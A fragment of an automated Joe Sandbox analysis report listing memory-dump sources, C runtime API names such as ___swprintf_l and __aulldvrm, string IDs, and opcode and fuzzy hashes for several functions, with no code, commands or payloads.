                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
                                                      • Instruction ID: e4966814de8c5d8b875505ed2bc6d9e8bdb322b970a2ceea9f19dccad9abd3af
                                                      • Opcode Fuzzy Hash: ed570969d0e56b6bd2389d8ff04939e73eca352629c4b3725e315772b3cee92b
                                                      • Instruction Fuzzy Hash: 94318976A01219AFCB20DF29CC44BEEB7F8EF48610F544955E849E7241EB30EA458FB0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: cdd063200fc3acc9cf95085a8a7dfdae8c25afde5af32aefc6740c983e925130
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: E1919470E0035AEBDB28DE69C881ABEB7A5FF44720F58461AE875E72D0D730B9418B51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
                                                      • Instruction ID: 7beaa4c4d7eef1cce7a9e688e6a591f81f99812e220a87ceed8aaddd4249b48a
                                                      • Opcode Fuzzy Hash: c905cf2d561d3e3b556dd69be60f0a521881c862bbbc4ec1ef5ec690dd67abac
                                                      • Instruction Fuzzy Hash: 9D814B75D00269DBDB71DB54CC54BEEB7B8AB09710F0445EAEA09B7291D7305E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0378CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Cw@4Cw
                                                      • API String ID: 4062629308-3101775584
                                                      • Opcode ID: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
                                                      • Instruction ID: 6484dccba575c5188abe4cd5a033dfa1f007a359f82fe67103121bfa1d0a2bea
                                                      • Opcode Fuzzy Hash: a0546284ea689418041b0b0f6b3f3c686f005b86bf590ed44f334f75890bc6de
                                                      • Instruction Fuzzy Hash: 7341BF76A40218DFDB21EFA9C844A6DFBB8FF45B00F04442AE914EF295D734D801DB61